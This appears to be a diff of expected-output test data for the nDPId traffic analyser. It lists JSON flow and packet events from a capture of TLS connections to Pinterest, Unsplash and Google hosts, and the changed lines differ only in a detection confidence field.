{"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714782,"flow_last_seen":1605289714782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714782,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605289714782,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714782,"pkt":"qtsDr8lk5EKm5WPyht1gCp8uACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3toBu85LuqIAAAAAoAL9IEOtAAACBAWgBAIICnRgZN4AAAAAAQMDBw=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605289714832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714832,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAByAqAcsBIEmLB5kd7IUo3\/YpAbve2qyyOFrOS7qjoBJXgB0bAAACBAV4AQMDAwQCCArCuSSHdGBk3g=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1605289714832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714832,"pkt":"qtsDr8lk5EKm5WPyht1gCp8uACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3toBu85LuqOssjhbgBAB+6D6AAABAQgKdGBlEMK5JIc="} -00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714782,"flow_last_seen":1605289714833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714833,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":870,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714782,"flow_last_seen":1605289714867,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289714867,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -03219{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":876,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289714782,"flow_last_seen":1605289714869,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6069,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1605289714869,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","server_names":"imgix2.map.fastly.net,*.camp-fire.jp,*.carwow.co.uk,*.carwow.de,*.carwow.es,*.catchandrelease.com,*.dorothee-schumacher.com,*.footway.com,*.img-ikyu.com,*.imgix.drizly.com,*.instamotor.com,*.microdinc.com,*.msastaging.com,*.peddle.com,*.remax.ca,*.ustudio.com,*.vaping360.com,*.weber.com,article-image-ix.nikkei.com,assets.eberhardt-travel.de,assets.verishop.com,assets.verishop.xyz,cdn.airstream.com,cdn.elementthree.com,cdn.hashnode.com,cdn.naturalhealthyconcepts.com,cdn.parent.eu,cdn.phonehouse.es,cdn.shiplus.co.il,i.drop-cdn.com,i.upworthy.com,image.volunteerworld.com,imageproxy.themaven.net,images-dev.takeshape.io,images.101cookbooks.com,images.beano.com,images.businessoffashion.com,images.congstar.de,images.diesdas.digital,images.fandor.com,images.greetingsisland.com,images.malaecuia.com.br,images.omaze.com,images.roulottesgagnon.com,images.takeshape.io,images.thewanderful.co,images.unsplash.com,images.victoriaplum.com,images.vraiandoro.com,img-1.homely.com.au,img-stack.imagereflow.com,img.badshop.se,img.bernieandphyls.com,img.bioopticsworld.com,img.broadbandtechreport.com,img.broadwaybox.com,img.bygghemma.se,img.bygghjemme.no,img.byggshop.se,img.cablinginstall.com,img.dentaleconomics.com,img.dentistryiq.com,img.evaluationengineering.com,img.golvshop.se,img.grudado.com.br,img.industrial-lasers.com,img.induux.de,img.intelligent-aerospace.com,img.inturn.co,img.laserfocusworld.com,img.ledsmagazine.com,img.lightwaveonline.com,img.militaryaerospace.com,img.mychannels.video,img.officer.com,img.offshore-mag.com,img.ogj.com,img.perioimplantadvisory.com,img.plasticsmachinerymagazine.com,img.prevu.com,img.rdhmag.com,img.speedcurve.com,img.strategies-u.com,img.utilityproducts.com,img.vision-systems.com,img.waterworld.com,img.workbook.com,img.xlhemma.se,img1.nowpurchase.com,iw.induux.de,m.22slides.com,media.sailrace.com,media.useyourlocal.com,pictures.hideaways.dk,raven.contrado.com,resources.intuitive.com,static.doorsuperstore.co.uk","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=imgix2.map.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1F:BC:A1:79:48:96:70:32:B8:08:C1:38:D4:20:12:BE:D9:6F:14:B6"}} +00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714782,"flow_last_seen":1605289714833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714833,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":870,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714782,"flow_last_seen":1605289714867,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289714867,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +03219{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":876,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289714782,"flow_last_seen":1605289714869,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6069,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1605289714869,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","server_names":"imgix2.map.fastly.net,*.camp-fire.jp,*.carwow.co.uk,*.carwow.de,*.carwow.es,*.catchandrelease.com,*.dorothee-schumacher.com,*.footway.com,*.img-ikyu.com,*.imgix.drizly.com,*.instamotor.com,*.microdinc.com,*.msastaging.com,*.peddle.com,*.remax.ca,*.ustudio.com,*.vaping360.com,*.weber.com,article-image-ix.nikkei.com,assets.eberhardt-travel.de,assets.verishop.com,assets.verishop.xyz,cdn.airstream.com,cdn.elementthree.com,cdn.hashnode.com,cdn.naturalhealthyconcepts.com,cdn.parent.eu,cdn.phonehouse.es,cdn.shiplus.co.il,i.drop-cdn.com,i.upworthy.com,image.volunteerworld.com,imageproxy.themaven.net,images-dev.takeshape.io,images.101cookbooks.com,images.beano.com,images.businessoffashion.com,images.congstar.de,images.diesdas.digital,images.fandor.com,images.greetingsisland.com,images.malaecuia.com.br,images.omaze.com,images.roulottesgagnon.com,images.takeshape.io,images.thewanderful.co,images.unsplash.com,images.victoriaplum.com,images.vraiandoro.com,img-1.homely.com.au,img-stack.imagereflow.com,img.badshop.se,img.bernieandphyls.com,img.bioopticsworld.com,img.broadbandtechreport.com,img.broadwaybox.com,img.bygghemma.se,img.bygghjemme.no,img.byggshop.se,img.cablinginstall.com,img.dentaleconomics.com,img.dentistryiq.com,img.evaluationengineering.com,img.golvshop.se,img.grudado.com.br,img.industrial-lasers.com,img.induux.de,img.intelligent-aerospace.com,img.inturn.co,img.laserfocusworld.com,img.ledsmagazine.com,img.lightwaveonline.com,img.militaryaerospace.com,img.mychannels.video,img.officer.com,img.offshore-mag.com,img.ogj.com,img.perioimplantadvisory.com,img.plasticsmachinerymagazine.com,img.prevu.com,img.rdhmag.com,img.speedcurve.com,img.strategies-u.com,img.utilityproducts.com,img.vision-systems.com,img.waterworld.com,img.workbook.com,img.xlhemma.se,img1.nowpurchase.com,iw.induux.de,m.22slides.com,media.sailrace.com,media.useyourlocal.com,pictures.hideaways.dk,raven.contrado.com,resources.intuitive.com,static.doorsuperstore.co.uk","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=imgix2.map.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1F:BC:A1:79:48:96:70:32:B8:08:C1:38:D4:20:12:BE:D9:6F:14:B6"}} 00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2206,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715133,"flow_last_seen":1605289715133,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715133,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2206,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1605289715133,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715133,"pkt":"qtsDr8lk5EKm5WPyht1gAUyOACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyX4Bu+HPmfcAAAAAoAL9IJHxAAACBAWgBAIICjiITggAAAAAAQMDBw=="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2778,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605289715210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715210,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvJfoEpGV7hz5n4oBJXgLSTAAACBAV4AQMDAwQCCArCuSXYOIhOCA=="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2781,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1605289715210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715210,"pkt":"qtsDr8lk5EKm5WPyht1gAUyOACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyX4Bu+HPmfiBKRlfgBAB+zhYAAABAQgKOIhOVcK5Jdg="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2792,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715133,"flow_last_seen":1605289715212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2792,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715133,"flow_last_seen":1605289715212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2896,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715221,"flow_last_seen":1605289715221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2896,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1605289715221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715221,"pkt":"qtsDr8lk5EKm5WPyht1gDRmqACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1JABu7b0CzwAAAAAoAL9ILgWAAACBAWgBAIICnB0noAAAAAAAQMDBw=="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3385,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605289715273,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715273,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvUkNYqBSe29As9oBJXgJmfAAACBAV4AQMDAwQCCArCuSYncHSegA=="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3387,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1605289715273,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715273,"pkt":"qtsDr8lk5EKm5WPyht1gDRmqACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1JABu7b0Cz3WKgUogBAB+x19AAABAQgKcHSetMK5Jic="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3394,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715221,"flow_last_seen":1605289715274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3394,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715221,"flow_last_seen":1605289715274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3395,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715274,"flow_last_seen":1605289715274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3395,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605289715274,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715274,"pkt":"qtsDr8lk5EKm5WPyht1gCiKuACgGQCoBywEgSYsHmR3shSjf9ikqAyiA8DAAE\/rOsAwAAAADyFwBu3K5vIYAAAAAoAL9IIqeAAACBAWgBAIICrhM3AoAAAAAAQMDBw=="} -00995{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3513,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715133,"flow_last_seen":1605289715287,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289715287,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00995{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3513,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715133,"flow_last_seen":1605289715287,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289715287,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 